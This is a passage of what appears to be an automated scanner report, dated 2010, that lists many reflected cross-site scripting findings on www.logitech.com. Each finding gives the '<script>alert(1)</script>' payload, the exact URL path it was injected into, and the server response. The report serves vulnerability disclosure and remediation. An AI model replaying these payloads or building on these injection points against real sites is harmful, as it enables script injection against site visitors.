The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ea07</script><script>alert(1)</script>187e332f9e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/footer/privacy9ea07</script><script>alert(1)</script>187e332f9e4/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:53:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55105"><script>alert(1)</script>88a97f14cb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/footer/privacy55105"><script>alert(1)</script>88a97f14cb1/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b0c4"><script>alert(1)</script>7484e817b28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us7b0c4"><script>alert(1)</script>7484e817b28/footer/terms-of-use HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8421</script><script>alert(1)</script>e755ae46a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e8421</script><script>alert(1)</script>e755ae46a0/footer/terms-of-use HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff9e"><script>alert(1)</script>84bfbf34487 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/footer5ff9e"><script>alert(1)</script>84bfbf34487/terms-of-use HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb003</script><script>alert(1)</script>961eb5694b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/footereb003</script><script>alert(1)</script>961eb5694b6/terms-of-use HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeec5"><script>alert(1)</script>e829f219ab9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/footer/terms-of-useeeec5"><script>alert(1)</script>e829f219ab9 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4f6c</script><script>alert(1)</script>0de3687c7b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/footer/terms-of-used4f6c</script><script>alert(1)</script>0de3687c7b9 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 633e9"%3b7d1bf8750c5 was submitted in the REST URL parameter 1. This input was echoed as 633e9";7d1bf8750c5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us633e9"%3b7d1bf8750c5/for-business HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0857</script><script>alert(1)</script>f3962a95a7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e0857</script><script>alert(1)</script>f3962a95a7d/for-business HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49571"><script>alert(1)</script>d81e3f9c142 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us49571"><script>alert(1)</script>d81e3f9c142/for-business HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96d34</script><script>alert(1)</script>b4d43cdfa68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/for-business96d34</script><script>alert(1)</script>b4d43cdfa68 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f860f"><script>alert(1)</script>5dec2b42091 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/for-businessf860f"><script>alert(1)</script>5dec2b42091 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b61a6"><script>alert(1)</script>a5ed5b8b9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usb61a6"><script>alert(1)</script>a5ed5b8b9f/gaming?WT.ac=overview HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11589</script><script>alert(1)</script>597acf3f2f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /11589</script><script>alert(1)</script>597acf3f2f3/gaming?WT.ac=overview HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b62a5"%3bb87f747339f was submitted in the REST URL parameter 1. This input was echoed as b62a5";b87f747339f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usb62a5"%3bb87f747339f/gaming?WT.ac=overview HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acbd4</script><script>alert(1)</script>5af6bea402f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gamingacbd4</script><script>alert(1)</script>5af6bea402f?WT.ac=overview HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 209cf"><script>alert(1)</script>4cd2257d9f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/gaming209cf"><script>alert(1)</script>4cd2257d9f5?WT.ac=overview HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4df19"%3b33f822c155 was submitted in the REST URL parameter 1. This input was echoed as 4df19";33f822c155 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us4df19"%3b33f822c155/gaming/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82356</script><script>alert(1)</script>b2f5de9ddae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /82356</script><script>alert(1)</script>b2f5de9ddae/gaming/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8748d"><script>alert(1)</script>382bd1282b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us8748d"><script>alert(1)</script>382bd1282b6/gaming/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24d52"><script>alert(1)</script>75a90db9051 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/gaming24d52"><script>alert(1)</script>75a90db9051/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a36f3</script><script>alert(1)</script>d080aabf35b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gaminga36f3</script><script>alert(1)</script>d080aabf35b/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e758</script><script>alert(1)</script>e8874bf9f33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8e758</script><script>alert(1)</script>e8874bf9f33/gaming/controllers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 407e2"><script>alert(1)</script>5f95925d468 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us407e2"><script>alert(1)</script>5f95925d468/gaming/controllers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdaa2</script><script>alert(1)</script>439465b9575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gamingcdaa2</script><script>alert(1)</script>439465b9575/controllers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd9a"><script>alert(1)</script>0f501ccc495 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/gaming5dd9a"><script>alert(1)</script>0f501ccc495/controllers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a29b5"><script>alert(1)</script>fba2a193f08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/gaming/controllersa29b5"><script>alert(1)</script>fba2a193f08 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
